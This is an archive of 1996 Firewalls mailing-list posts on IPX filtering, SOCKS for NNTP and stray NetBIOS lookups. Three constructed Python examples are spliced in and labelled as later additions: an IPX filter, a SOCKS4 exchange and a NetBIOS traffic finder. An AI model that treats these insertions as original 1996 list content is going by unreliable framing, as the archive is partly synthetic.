Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There are no secure UNIXes, only security conscious administrators giff Wayne Gifford - Dr. SunScreen giff@east.sun.com Sun Internet Commerce Group Phone 703-716-6426 2100 Reston Parkway Phax 703-620-1244 Reston VA, 22091 From firewalls-owner Tue Feb 6 11:27:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25942 for firewalls-outgoing; Tue, 6 Feb 1996 10:35:23 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25934 for ; Tue, 6 Feb 1996 10:35:15 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 13:34:18 EST Received: from relay7.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 19:58:51 EST Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQaarj22334; Mon, 29 Jan 1996 19:50:29 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA00677 for firewalls-outgoing; Mon, 29 Jan 1996 15:50:24 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA00672 for ; Mon, 29 Jan 1996 15:50:21 -0800 (PST) Received: from maestro.Maestro.COM by relay5.UU.NET with SMTP id QQaarf06863; Mon, 29 Jan 1996 18:49:14 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA02510; Mon, 29 Jan 96 18:38:49 EST Date: Mon, 29 Jan 1996 18:38:48 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Desktop tools needed Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ah would like to say Thank You to all those great d00ds who provided pointers to kewl tewlz and also those folks who pointed out there are legitimate utilities. Ah get so carried away with sniffing and cracking that Ah often forgit there is legal ways to do things. 
Henceforth, by popular vote, Professor Patch, Dalmation Nation shall be known as Hack Dawgie Dawg. Thanks also to those whose grey matter provided original names, especially Mark.

Sick Puppy, the Cat_Eating_Dawg
the Church of the Dead Meow

From firewalls-owner Tue Feb 6 11:38:46 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27234 for firewalls-outgoing; Tue, 6 Feb 1996 11:06:42 -0800 (PST)
Received: from esl-hub.demon.co.uk (esl-hub.demon.co.uk [158.152.8.209]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA27072 for ; Tue, 6 Feb 1996 11:03:26 -0800 (PST)
Path: esl.tex.com!dbuckley
From: dbuckley@esl.tex.com (David Buckley)
Subject: Re: Internet-access from Novell
References: <14223c_20@gaitor.tex.com>
To: firewalls@greatcircle.com
Message-ID: <823657988snx@esl.tex.com>
X-Mailer: cppnews $Revision: 1.41 $
Date: Tue, 06 Feb 96 18:53:08 GMT
Organization: Electric Solutions Ltd
Lines: 96
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <14223c_20@gaitor.tex.com> you write:

> Here's the worse problem I mentioned.
>
> I've grepped over 9000 archived articles of this group
> and found no mention of how to firewall novell boxes from
> each other. I have a client in the financial industry who
> has a market data feed from a provider. The market data feed
> is provided by a novell server on a leased line, with special
> client software for the users. How do I protect said client
> from, say, a disgruntled mailroom employee at the provider end,
> bent on hacking on the clients network?

Whoa! Let's slow down here.

Firstly, you're in the wrong area. You need novell experts, not networking experts, 'cos (and I'm a network professional slinging bricks from within my glass house here) most networking folk consider themselves 'above' IPX, and don't like the thought of that horrible stuff polluting their nice IP networks.

Nextly, Novell is in general orders of magnitude safer than the IP world.
Don't Panic!

There are two sorts of 'accesses' folks commonly talk about in reference to Novell, NetWare, or IPX/SPX:

1: NCP - this is the 'normal' mode of operation of a client workstation logging into a fileserver, for file and print services. This uses IPX as its underlying transport.

2: IPX not involving NCP or SPX - these are essentially a peer to peer service, which only involves a fileserver if the fileserver happens to be one of the peers involved. An example of this would be NetWare for SAA, which is an IBM 3270 gateway that happens to run on a fileserver platform, as opposed to being stand alone on a non-fileserver box.

Firstly, NCP: Clients access servers, not the other way round, so access to a server can't compromise a client workstation's files directly. This means the worst your disgruntled mailroom employee can do is destroy the feeding fileserver. Obviously, he could alter a .BAT or .EXE to wreak havoc on a client, but as this .EXE or .BAT has legitimately been accessed by the client, it's impossible(ish) to guard against by normal firewall tricks.

> I'm not even sure what novell uses in lieu of tcp/udp ports;
> pointers to IPX/SPX docs, and the Novell equivalent of
> an /etc/services file would be most appreciated.

IPX is roughly equal to UDP
SPX is roughly equal to TCP

There is no /etc/services in the Novell world. The nearest is the lists published on the net of what the various sockets have been found to do. Novell hold but don't publish the official list.

If you run IP on a fileserver, you do have a sys:etc/services file, a program called INETD.NLM, and it works identically to the unix variant. Products like FLeX/IP, NFS Gateway fit the bill of IP on a server.

>> Are there any IPX/SPX packet filters available?

Yes; almost all routers can filter IPX/SPX, and novell themselves do a filter set (called MultiProtocol router) that runs right on the fileserver. A low cost, effective standalone firewall is the KarlBridge, commercial version.
>> Are there any IPX proxy server firewalls available?

Not of which I am aware.

>> CJC from Novell mentioned their existence, but gave little other info.

>> Of course I'll start by recommending that the market data feed box go
>> onto its own ethernet segment, and that IP traffic is not forwarded on
>> or off of that segment.

To give a reasoned argument I need more detail. I spend my days in the City of London, looking after large multiprotocol networks in financial houses, so should be able to give you an exact answer.

Specifically, what does the leased line connect to, a router, the back of the fileserver, an application gateway etc? What's the name of the service - I may have been thru this one already...

(and you may wish to mail me the reply as well, 'cos I don't always have time to read firewalls...)

--
----------------------------------------+------------------------------------
David Buckley of Electric Solutions Ltd | Email: dbuckley@esl.tex.com
Services to the Computing,Electronics   |
and Entertainment industries.
                                        |
-----------------------------------------------------------------------------

From firewalls-owner Tue Feb 6 12:42:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01539 for firewalls-outgoing; Tue, 6 Feb 1996 12:26:08 -0800 (PST)
Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01532 for ; Tue, 6 Feb 1996 12:26:03 -0800 (PST)
Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 15:25:24 EST
Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 05 Feb 1996 19:33:42 EST
Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQabrd28384; Mon, 5 Feb 1996 19:20:32 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26046 for firewalls-outgoing; Mon, 5 Feb 1996 11:46:49 -0800 (PST)
Received: from syr.edu (syr.EDU [128.230.1.49]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26041 for ; Mon, 5 Feb 1996 11:46:44 -0800 (PST)
Received: from syru4-109.syr.EDU by syr.edu (8.6.9/CNS) id OAA11093; Mon, 5 Feb 1996 14:46:21 -0500
Message-ID: <3116889F.5FCF@syr.edu>
Date: Mon, 05 Feb 1996 14:45:51 -0800
From: Peter Morrissey
To: Firewalls@GreatCircle.COM
Subject: Novell inside IP Port?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Are there known TCP/UDP port(s) that support the tunneling of Novell inside IP? Someone recently set up such a tunnel and exposed all our Novell Servers to the Internet. I would like to prevent this from happening in the future.
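David Buckley's point above that IPX has sockets rather than TCP/UDP ports and no /etc/services, and Peter Morrissey's wish to keep Novell traffic where it belongs, as an added example that is not code from either post, from Novell, or from any router or KarlBridge product. It parses the 30-byte IPX header and applies the default-deny rule Buckley's description suggests for a feed link: workstations talk to the server's NCP socket, the server answers from it, and nothing else crosses (RIP and SAP advertisements from the provider side are dropped). The socket numbers are the well-known ones; the network numbers, node addresses, policy and sample frames are constructed for the example.

```python
"""IPX header parsing and a socket-based filter rule for a market-data feed link.

Added example; not code from the mailing-list posts, from Novell, or from any
router or KarlBridge product.  The 30-byte big-endian IPX header layout and the
well-known socket numbers are standard; the two network numbers, the node
addresses, the policy and the sample frames are constructed for the example.
"""
import struct
from dataclasses import dataclass

# checksum, length, transport control, packet type,
# dst net/node/socket, src net/node/socket  (2+2+1+1+4+6+2+4+6+2 = 30 bytes)
IPX_HEADER_FMT = ">HHBBI6sHI6sH"
IPX_HEADER_LEN = struct.calcsize(IPX_HEADER_FMT)

# Well-known IPX sockets: the nearest thing IPX has to /etc/services.
NCP_SOCKET = 0x0451      # file/print service (clients talk TO this socket)
SAP_SOCKET = 0x0452      # Service Advertising Protocol
RIP_SOCKET = 0x0453      # Routing Information Protocol

# Constructed network numbers for the two sides of the leased line.
PROVIDER_NET = 0x0000BEEF   # the feed provider's fileserver lives here (untrusted side)
CLIENT_NET = 0x0000CAFE     # the client's workstations live here


@dataclass(frozen=True)
class IpxHeader:
    length: int
    transport_control: int
    packet_type: int
    dst_net: int
    dst_node: bytes
    dst_socket: int
    src_net: int
    src_node: bytes
    src_socket: int


def parse_ipx(frame: bytes) -> IpxHeader:
    """Decode the IPX header at the start of a frame, rejecting malformed ones."""
    if len(frame) < IPX_HEADER_LEN:
        raise ValueError("frame shorter than an IPX header")
    (checksum, length, tc, ptype, dst_net, dst_node, dst_sock,
     src_net, src_node, src_sock) = struct.unpack(IPX_HEADER_FMT, frame[:IPX_HEADER_LEN])
    if checksum != 0xFFFF:               # IPX carries no checksum; the field is always 0xFFFF
        raise ValueError("IPX checksum field is not 0xFFFF")
    if not IPX_HEADER_LEN <= length <= len(frame):
        raise ValueError("IPX length field disagrees with the frame")
    return IpxHeader(length, tc, ptype, dst_net, dst_node, dst_sock, src_net, src_node, src_sock)


def build_ipx(ptype, src_net, src_node, src_sock, dst_net, dst_node, dst_sock, payload=b"") -> bytes:
    """Assemble a frame; used here only to construct sample input."""
    hdr = struct.pack(IPX_HEADER_FMT, 0xFFFF, IPX_HEADER_LEN + len(payload), 0, ptype,
                      dst_net, dst_node, dst_sock, src_net, src_node, src_sock)
    return hdr + payload


def filter_ipx(hdr: IpxHeader) -> tuple[bool, str]:
    """Default-deny policy for the feed link: NCP clients access servers, never
    the other way round.  Returns (allowed, reason)."""
    if hdr.src_net == PROVIDER_NET and hdr.dst_net == CLIENT_NET:
        if hdr.src_socket in (RIP_SOCKET, SAP_SOCKET) or hdr.dst_socket in (RIP_SOCKET, SAP_SOCKET):
            return False, "route/service advertisements from the provider side"
        if hdr.src_socket == NCP_SOCKET:
            return True, "NCP reply from the feed server"
        return False, "unsolicited non-NCP traffic from the provider side"
    if hdr.src_net == CLIENT_NET and hdr.dst_net == PROVIDER_NET:
        if hdr.dst_socket == NCP_SOCKET:
            return True, "NCP request to the feed server"
        return False, "client traffic to a non-NCP socket on the provider side"
    return False, "not a client<->provider flow"


def decide(frame: bytes) -> tuple[bool, str]:
    """Parse then filter; malformed frames are dropped rather than raising."""
    try:
        return filter_ipx(parse_ipx(frame))
    except ValueError as exc:
        return False, f"malformed: {exc}"


# Constructed sample frames (packet type 17 = NCP, 4 = PEP as used by SAP).
FEED_SERVER_NODE = bytes.fromhex("0000c0ffee01")
WORKSTATION_NODE = bytes.fromhex("0000aa000001")
BROADCAST_NODE = b"\xff" * 6

NCP_REQUEST = build_ipx(17, CLIENT_NET, WORKSTATION_NODE, 0x4003, PROVIDER_NET, FEED_SERVER_NODE, NCP_SOCKET)
NCP_REPLY = build_ipx(17, PROVIDER_NET, FEED_SERVER_NODE, NCP_SOCKET, CLIENT_NET, WORKSTATION_NODE, 0x4003)
SAP_BROADCAST = build_ipx(4, PROVIDER_NET, FEED_SERVER_NODE, SAP_SOCKET, CLIENT_NET, BROADCAST_NODE, SAP_SOCKET)

if __name__ == "__main__":
    for name, frame in (("NCP request", NCP_REQUEST), ("NCP reply", NCP_REPLY), ("SAP broadcast", SAP_BROADCAST)):
        print(name, decide(frame))
```

A real filter on a router or on the fileserver would express the same rule as socket and network matches; what the example adds is the shape of the header those matches read, and the reason SAP and RIP from the far side are the first things to drop: they are the advertisements that would let the provider's side inject routes and services into the client's network.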
From firewalls-owner Tue Feb 6 13:38:48 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04802 for firewalls-outgoing; Tue, 6 Feb 1996 13:36:19 -0800 (PST)
Received: from chrivb01.cch.com (chrivb01.cch.com [199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04797 for ; Tue, 6 Feb 1996 13:36:14 -0800 (PST)
Received: by chrivb01.cch.com id AA20841; Tue, 6 Feb 96 15:35:19 CST
Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma020835; Tue Feb 6 15:35:05 1996
Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA6289; Tue, 06 Feb 96 15:36:58 -0600
Message-Id: <9602062136.AA6289@notes.cch.com>
Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 72523663028188FA862562C8007596D5; Tue, 6 Feb 96 15:36:58
To: firewalls
From: "Richard Giering Jr."
Date: 6 Feb 96 15:33:51
Subject: RE: RPC
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks for the responses; both on the list and by direct Email. You all provided very good information and I'll be contacting some of those that offered.

(blush) Some things I should've known without you having to tell me (like RPC can run over TCP). Now getting the developers to code that way will be interesting. They tend to think they know best even when they don't.

Before I embarrass myself again, are there any references that you guys/gals could suggest?

Thanks again.

Rick Giering
CCH Inc.
From firewalls-owner Tue Feb 6 14:10:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA06435 for firewalls-outgoing; Tue, 6 Feb 1996 14:06:05 -0800 (PST)
Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA06402 for ; Tue, 6 Feb 1996 14:05:53 -0800 (PST)
Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 17:04:38 EST
Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 15:19:27 EST
Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQaaqq17285; Mon, 29 Jan 1996 15:02:25 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA00468 for firewalls-outgoing; Mon, 29 Jan 1996 07:18:06 -0800 (PST)
Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA00460 for ; Mon, 29 Jan 1996 07:18:02 -0800 (PST)
Received: by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.17) via UUCP id AA00148 ; Mon, 29 Jan 96 10:16:51 -0500
Received: (from bisley@localhost) by sb.lanier.com (8.6.12/8.6.6) id KAA01302 for firewalls@greatcircle.com; Mon, 29 Jan 1996 10:19:19 -0500
From: Brad Isley
Message-ID: <199601291519.KAA01302@sb.lanier.com>
Subject: Re: USE OF 'MANAGED' INTERNET CONNECTION
To: firewalls@greatcircle.com
Date: Mon, 29 Jan 1996 10:19:18 -0500 (EST)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> unless the ISP is bonded I wouldn't even think of trusting my ISP to watch
> me. What is preferable instead is a 3rd 'expert trusted" party
> to watch both my isp and intruders. An ISP if broken into and most usually
> are is NOT in a position to administer site security.. Every ISP
> I have seen is totally clueless in this respect.

I have used services from two providers in Atlanta which not only have clues, but even knew when they were cracked.
Then they tracked the sukka down and plugged the hole.

Were they cracked without knowing? Probably. Would I trust them? No. But it's not so bleak as some may think. They both are quite knowledgeable about security and take it seriously.

From firewalls-owner Tue Feb 6 14:47:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07210 for firewalls-outgoing; Tue, 6 Feb 1996 14:29:01 -0800 (PST)
Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07205 for ; Tue, 6 Feb 1996 14:28:55 -0800 (PST)
Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA03687; Tue, 6 Feb 1996 15:15:18 -0600
Date: Tue, 6 Feb 1996 15:15:18 -0600
From: Sten Drescher
Message-Id: <199602062115.PAA03687@grendel.texas.net>
To: smithj@rd.qms.com (John Smith)
CC: Firewalls@GreatCircle.COM
In-reply-to: smithj@rd.qms.com's message of Tue, 6 Feb 96 07:54:56 CST
Subject: Re: Socks and Internet News
References: <9602061354.AA01952@joker.rd.qms.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

smithj@rd.qms.com (John Smith) said:

JS> Is there a way to safely tunnel NNTP through SOCKS? Since I'm
JS> having to 'experiment' on our running firewall I want to make sure
JS> I get it right without opening 10k new holes. Thanks for any
JS> advice.

Well, NNTP is a tcp connection, so if you use a newsreader compiled with SOCKS, you shouldn't have any problems. When I was behind a SOCKS firewall, I used emacs Gnus. Initially I just used a SOCKSified tcp.c, and later SOCKSified emacs itself.

--
#include /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.
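The SOCKS4 CONNECT exchange behind Sten Drescher's answer, as an added example that is not code from the post, from Gnus or from any SOCKS distribution. It runs both sides in one process: the SOCKSified newsreader sends VN=4, CD=1, the destination port and address and a user id, and the firewall's SOCKS daemon answers with an 8-byte grant or rejection, after which plain NNTP flows over the relayed TCP connection. The point for John Smith's worry about "opening 10k new holes" is that the daemon decides per CONNECT, so it can admit port 119 and nothing else. The addresses, user id and port policy are constructed.

```python
"""SOCKS4 CONNECT exchange for an NNTP session, both sides in one process.

Added example; not code from Sten Drescher's post, from Gnus, or from any
SOCKS distribution.  The SOCKS4 request and reply layouts are the protocol's
own; the addresses, the user id and the proxy's port policy are constructed.
"""
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 90      # "request granted"
REPLY_REJECTED = 91     # "request rejected or failed"
NNTP_PORT = 119

# Constructed proxy policy: the firewall's SOCKS daemon only relays to NNTP.
ALLOWED_DST_PORTS = {NNTP_PORT}


def build_connect_request(dst_ip: str, dst_port: int, userid: str) -> bytes:
    """VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL: what a SOCKSified client sends first."""
    return (struct.pack(">BBH4s", SOCKS_VERSION, CMD_CONNECT, dst_port, socket.inet_aton(dst_ip))
            + userid.encode("ascii") + b"\x00")


def parse_connect_request(data: bytes) -> tuple[int, str, int, str]:
    """Return (command, dst_ip, dst_port, userid); reject anything that is not SOCKS4."""
    if len(data) < 9 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS4 request")
    _vn, cmd, port, ip = struct.unpack(">BBH4s", data[:8])
    nul = data.find(b"\x00", 8)
    if nul < 0:
        raise ValueError("unterminated USERID")
    return cmd, socket.inet_ntoa(ip), port, data[8:nul].decode("ascii")


def build_reply(code: int) -> bytes:
    """VN=0, CD=code, then a DSTPORT/DSTIP pair the client ignores for CONNECT."""
    return struct.pack(">BBH4s", 0, code, 0, b"\x00\x00\x00\x00")


def parse_reply(data: bytes) -> bool:
    """True when the proxy granted the CONNECT; raise on a malformed reply."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    return data[1] == REPLY_GRANTED


def proxy_decide(request: bytes) -> bytes:
    """The firewall side: grant only CONNECTs to the ports the policy lists."""
    try:
        cmd, _ip, port, _user = parse_connect_request(request)
    except ValueError:
        return build_reply(REPLY_REJECTED)
    if cmd != CMD_CONNECT or port not in ALLOWED_DST_PORTS:
        return build_reply(REPLY_REJECTED)
    return build_reply(REPLY_GRANTED)


def newsreader_connect(dst_ip: str, dst_port: int, userid: str) -> bool:
    """Client side: send the request, read the 8-byte reply, and report whether
    the TCP relay was set up.  After a grant, plain NNTP flows over the socket."""
    request = build_connect_request(dst_ip, dst_port, userid)
    return parse_reply(proxy_decide(request))


if __name__ == "__main__":
    # 192.0.2.10 is a constructed news-host address.
    print("NNTP :", newsreader_connect("192.0.2.10", NNTP_PORT, "reader"))
    print("other:", newsreader_connect("192.0.2.10", 6667, "reader"))
```

On a real firewall the two halves would sit on different machines with a socket between them; the decision point is the same, and the user id field is unauthenticated in SOCKS4, so the port policy rather than the name is what limits exposure.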
From firewalls-owner Tue Feb 6 14:53:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07537 for firewalls-outgoing; Tue, 6 Feb 1996 14:41:01 -0800 (PST)
Received: from mail.telstra.com.au (mail.telstra.com.au [192.148.160.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07525 for ; Tue, 6 Feb 1996 14:40:55 -0800 (PST)
Received: from mail_gw.fwall.telecom.com.au(192.148.147.10) by mail via smap (V1.3) id sma012380; Wed Feb 7 03:12:32 1996
Received: from cdn_mail.dn.itg.telecom.com.au(144.135.109.134) by mail_gw.telecom.com.au via smap (V1.3) id sma008898; Wed Feb 7 09:34:41 1996
Received: from cednsw.telecom.com.au. (cede.telecom.com.au [144.132.122.196]) by cdn_mail.dn.itg.telecom.com.au (8.6.11/8.6.9) with ESMTP id JAA12787 for ; Wed, 7 Feb 1996 09:34:41 +1100
Received: (from bwa@localhost) by cednsw.telecom.com.au. (8.6.11/8.6.9) id JAA18385 for firewalls@greatcircle.com; Wed, 7 Feb 1996 09:34:35 +1100
Date: Wed, 7 Feb 1996 09:34:35 +1100
From: Barry Anderson
Message-Id: <199602062234.JAA18385@cednsw.telecom.com.au.>
To: firewalls@greatcircle.com
Subject: MAIL LOOP!!!
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

atlanta.net. Lurve them Vaxen...
cheers,
Barry

From firewalls-owner Tue Feb 6 15:08:34 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07738 for firewalls-outgoing; Tue, 6 Feb 1996 14:46:11 -0800 (PST)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA07732 for ; Tue, 6 Feb 1996 14:46:06 -0800 (PST)
Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQabup11120; Tue, 6 Feb 1996 17:45:24 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA29248; Tue, 6 Feb 96 17:34:34 EST
Date: Tue, 6 Feb 1996 17:34:31 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Follow up on Windows 95/NT trying to use firewall DNS
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The shop I was watching where PC's running Windows 95 and Windows NT were trying to unsuccessfully look up NetBios names in the firewall DNS appears to have solved their problem. As I understand it, they used sniffers to determine which machines were connecting to Unix hosts on port 137 and 138, then went to each one of those Windows machines in turn and under Network, Network Bindings, turned off everything except TCP/IP. Of course this won't be a fix if you are running multiple protocols.

Now some d00d just sent me mail asking "Has anyone ever told you ... that your weird." Sure. My mom. And everyone who has seen my Sunday morning ritual of drilling holes in water melons and coconuts, and then eating them, in memory of Jeffrey Dahmer. If ah was ritch, ah would be called eccentric, not weird. But then ah is not totally eccentric. Ah would NEVER sniff someone's rear without first asking their permission, because that's not polite among MaNimals.
SP, tCED cDm

From firewalls-owner Tue Feb 6 15:24:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA09483 for firewalls-outgoing; Tue, 6 Feb 1996 15:21:10 -0800 (PST)
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA09478 for ; Tue, 6 Feb 1996 15:21:06 -0800 (PST)
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id RAA16865 for GreatCircle.COM!firewalls; Tue, 6 Feb 1996 17:12:08 -0600 (CST)
Received: by ris1.nmti.com (smail2.5) id AA15430; 6 Feb 96 17:42:40 CST (Tue)
Received: by sonic.nmti.com; id AA21227; Tue, 6 Feb 1996 17:13:22 -0600
From: peter@nmti.com (Peter da Silva)
Message-Id: <9602062313.AA21227@sonic.nmti.com.nmti.com>
Subject: Re: Survey
To: janken@rust.net (Kenneth J. Stephens)
Date: Tue, 6 Feb 1996 17:13:22 -0600 (CST)
Cc: goertzek@wangfed.com, firewalls@GreatCircle.COM
In-Reply-To: <199602061540.KAA18136@Fe3.rust.net> from "Kenneth J. Stephens" at Feb 6, 96 10:40:05 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> If the magazine publishers forced the issue date onto all of their reprints
> the vendors would have little use for the reprints. The date stamp would
> obsolete
> the reprint so quickly that the vendor would look foolish for distributing
> old info.

In other words the magazine is colluding in a deceptive practice.
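The sniffer step in Sick Puppy's Windows 95/NT follow-up above, as an added example that is not code from the post or from any sniffer: it reads tcpdump-style flow lines (constructed here) and lists the Windows hosts sending NetBIOS name-service (137) and datagram (138) traffic to Unix hosts, busiest first, which is the list of machines to visit and fix bindings on. The addresses and the Unix-host list are constructed; the ports are the NetBIOS-over-TCP/IP ones the post names.

```python
"""Find Windows hosts sending NetBIOS name/datagram traffic to Unix hosts.

Added example; not code from the post or from any sniffer.  The capture
lines, the addresses and the list of Unix hosts are constructed; the ports
(137 name service, 138 datagram) are the NetBIOS-over-TCP/IP ones.
"""
import re
from collections import Counter, defaultdict

NETBIOS_PORTS = {137: "netbios-ns", 138: "netbios-dgm"}

# Unix hosts that should never see NetBIOS traffic (constructed: the firewall DNS box).
UNIX_HOSTS = {"192.0.2.5": "fw-dns"}

# Matches the "src.port > dst.port:" part of a tcpdump line.
LINE_RE = re.compile(r"^\S+\s+(\d+\.\d+\.\d+\.\d+)\.(\d+)\s+>\s+(\d+\.\d+\.\d+\.\d+)\.(\d+):")

# Constructed capture: two Windows boxes hitting the DNS host on 137/138, a real
# DNS query, NetBIOS chatter between two Windows boxes, and an unparseable line.
SAMPLE_CAPTURE = """\
10:21:03.112233 192.0.2.21.137 > 192.0.2.5.137: udp 50
10:21:03.220011 192.0.2.21.137 > 192.0.2.5.137: udp 50
10:21:04.000102 192.0.2.22.138 > 192.0.2.5.138: udp 201
10:21:04.330000 192.0.2.21.1045 > 192.0.2.5.53: udp 31
10:21:05.010203 192.0.2.23.137 > 192.0.2.24.137: udp 50
garbage line that does not parse
"""


def netbios_talkers(capture: str, unix_hosts=UNIX_HOSTS):
    """Map each source host to the NetBIOS services it aimed at Unix hosts, with counts."""
    hits = defaultdict(Counter)
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines that are not flow lines
        src, _sport, dst, dport = m.groups()
        service = NETBIOS_PORTS.get(int(dport))
        if service and dst in unix_hosts:
            hits[src][service] += 1
    return {src: dict(c) for src, c in hits.items()}


def visit_list(capture: str) -> list[str]:
    """The machines to walk to and fix bindings on, busiest first."""
    talkers = netbios_talkers(capture)
    return sorted(talkers, key=lambda h: (-sum(talkers[h].values()), h))


if __name__ == "__main__":
    for host, counts in netbios_talkers(SAMPLE_CAPTURE).items():
        print(host, counts)
    print("visit:", visit_list(SAMPLE_CAPTURE))
```

The Windows-to-Windows line on port 137 is deliberately left out of the result: the post's problem was Windows boxes treating the firewall's DNS host as a name server, so only traffic aimed at the Unix hosts counts.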
From firewalls-owner Tue Feb 6 15:39:01 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA07934 for firewalls-outgoing; Tue, 6 Feb 1996 14:49:51 -0800 (PST)
Received: from ocean.st.usm.edu (ocean.st.usm.edu [131.95.110.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA07929 for ; Tue, 6 Feb 1996 14:49:45 -0800 (PST)
Received: (from rafuster@localhost) by ocean.st.usm.edu (8.6.12/8.6.9) id QAA13809 for Firewalls@GreatCircle.COM; Tue, 6 Feb 1996 16:50:45 -0600
Message-Id: <199602062250.QAA13809@ocean.st.usm.edu>
Subject: This is a test
To: Firewalls@GreatCircle.COM
Date: Tue, 6 Feb 1996 16:50:44 -0600 (CST)
From: "Raul Arturo Fuster"
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Hello everyone. I'm kinda new at this. This is an
> assignment for a class. What exactly is this about.
> I believe it is about internet security. If it is not
> let me know.
> Later.
> --
> Raul A. Fuster
> rafuster@ocean.st.usm.edu
> rafuster@whale.st.usm.edu
> http://ocean.st.usm.edu/~rafuster (under construction)
> Tel.
> (601)266-1196
>
> "CARPE DIEM"
>

From firewalls-owner Tue Feb 6 15:53:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08264 for firewalls-outgoing; Tue, 6 Feb 1996 14:57:39 -0800 (PST)
